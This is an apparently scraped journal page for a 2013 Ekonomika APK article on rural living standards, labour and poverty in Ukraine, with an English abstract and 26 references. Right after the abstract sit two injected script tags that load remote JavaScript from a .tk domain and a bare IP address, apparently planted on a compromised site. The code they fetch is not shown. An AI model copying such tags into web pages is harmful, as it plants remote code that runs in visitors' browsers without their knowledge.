ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 338.43:331.2-058.232.6
Інноваційна діяльність та інтелектуальний капітал

Material welfare of the rural population: labour dimensions and features of regulation / Vasylenka N.I. // Ekonomika APK. - 2013. - № 7 - P. 105

The economical, social and labour aspects that form living standards of the rural population is analyzed. A paper proves close interdependence between people’s working self-aktualization and level of their life. The article evaluates income structure and consumption level in urban and rural households. The influence of social assistance and unemployment benefits on labour motivation of the rural population was analyzed. The paper evaluates social development status in rural areas and its impact on living standards. The article proposes measures to improve the living standards of the rural population through the implementation of its labour on rural labor market. The analysis of specific laws in the context of their material welfare impact of the rural population is carried out. The government policies of overcoming poverty in rural areas and the state vectors of the material support level influence of rural families are reviewed. The author accents that priority of agriculture and agribusiness development forms conditions for improving living standards of the rural population. Directions of improvement the rural population living standards are shown. Tabl.: 1. Refs.: 26.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: the living standard, material welfare, poverty, income, consumption, rural population, employment potential

References

 1. Бугуцький О.А. Соціально-трудовий потенціал аграрної економіки / О.А. Бугуцький. – К. : УААН, Інститут аграрної економіки, 1996. – 228 с.
 2. Булавка О.Г. Соціалізація трудових ресурсів як передумова удосконалення зайнятості / О.Г. Булавка, Н.В. Германюк // Економіка АПК.– 2011. – № 7. – С. 129.
 3. Державна служба статистики України [Електронний ресурс]. – Режим доступу : http://www.ukrstat.gov.ua/.
 4. Державний класифікатор соціальних стандартів та нормативів [Електронний ресурс]. – Режим доступу: zakon.nau.ua.
 5. Дієсперов В.С. Оплата сільськогосподарської праці / В.С. Дієсперов // Економіка АПК.– 2012. – № 9. – С.76-83.
 6. Закон України «Про сільськогосподарську дорадчу діяльність». [Електронний ресурс]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/1807-15.
 7. Закон України «Про державні соціальні стандарти та державні соціальні гарантії» [Електронний ресурс]. – Режим доступу : zakon.rada.gov.ua/laws/show/2017-14.
 8. ЗаконУкраїни«Промежумалозабезпеченості»[Електроннийресурс].–Режимдоступу: zakon.rada.gov.ua/laws/show/190/94-вр.
 9. Закон України «Про основні засади державної аграрної політики на період до 2015 року» [Електронний ресурс]. – Режим доступу : zakon.rada.gov.ua/laws/show/2982-15.
 10. Закон України «Про особисте селянське господарство» [Електронний ресурс]. – Режим доступу: http://zakon4.rada.gov.ua/laws/show/742-15.
 11. ЗаконУкраїни«Пропрожитковиймінімум»[Електроннийресурс].–Режимдоступу: zakon.rada.gov.ua/go/966-14.
 12. Калетнік Г.М. Соціо-економічне становище населення та його вплив на формування продовольчої безпеки / Г. М Калетнік, Г.О. Пчелянська // Економіка АПК.– 2011. – № 7. – С. 38.
 13. Коротич О.Б. Розвиток України в напрямі досягнення європейських стандартів життя [Електронний ресурс] / О.Б. Коротич. – Режим доступу: http://www.nbuv.gov.ua/e-journals/DeBu/2006-1/doc/5/04.pdf .
 14. Малиновський А.С. Роль ініціативи громади в розвитку сільських територій / А. С. Малиновський // Економіка АПК.– 2012. – №9. – С.70-76.
 15. Проблеми та перспективи розвитку сільських територій України (на прикладі Карпатського регіону): науковоаналітична доп. / [В. В. Борщевський, Х. М. Притула, В. Є. Крупін, І. М. Куліш]; НАН України. Інститут регіональних досліджень. – Львів, 2011. – 60 с.
 16. Прокопа І. Сільські території України : дослідження і регулювання розвитку / І. Прокопа // Економіка України. – 2007. – №6. – С. 5-59.
 17. Рябоконь В.П. Вплив соціально-економічних чинників на стабілізацію кадрів у сільському господарстві / В.П Рябоконь // Економіка АПК.– 2011. – № 12. – С. 21.
 18. Рябоконь В.П. Соціально-економічна сутність аграрної політики та шляхи її реалізації / В.П. Рябоконь // Економіка АПК.– 2011. – №6. – С.4.
 19. Сільський сектор України на межі тисячоліть : У 2-х т. – Т. 2. Соціальні ресурси сільських територій / Л.О. Шепотько, І.В. Прокопа, С.О. Гудзинський та ін. – К. : Ін-т Економіки НАН України, 2003. – 466 с.
 20. Соціальні індикатори рівня життя сільського населення : стат. зб. – К., 2012 . – 204 с.
 21. Шляхи підвищення рівня життя сільського населення в Україні [за ред. Р. Шмідта] [Електронний ресурс]. – Режим доступу : http://icp.org.ua.
 22. Юрчишин В.В. Село і селяни України в системі історично і суспільно зумовлених вітчизняних національних цінностей / В.В. Юрчишин // Економіка АПК. – 2011. – № 3. – С. 112.
 23. Якуба К.І. Управління трудовими ресурсами села / К.І. Якуба // Управління комплексним розвитком агропромислового виробництва і сільських територій / [за ред. П.Т. Саблука, М.Ф. Кропивка]. – К. : ННЦ ІАЕ, 2011. – С. 193-205.
 24. Ярова В.В. Проблеми легалізації доходів населення / В.В. Ярова // Економіка АПК.– 2011. – № 12. – С. 57-62.
 25. Каlinowski S. Poziom życia ludnosci wiejskiej w Polsce / S. Каlinowski, B. Kielbasa // Roczniki naykove Stowarzyszenia economistow rolnictwa i agrobiznesu. – T. XIV, Z.4, – Warszaw-Poznan-Biawystok, 2012. – S. 50-54.
 26. Michalska S. Zrównoważony rozwój obszarów wiejskich a różnicujące się warunki życia mieszkańców wsi / S. Michalska, M. Błąd, D. Klepacka-Kołodziejska (red.) // Społeczno-ekonomiczne aspekty rozwoju polskiej wsi. – Warszawa : IRWiR PAN, 2007. – S. 111–120.
Read article: 13_07_105-112.pdf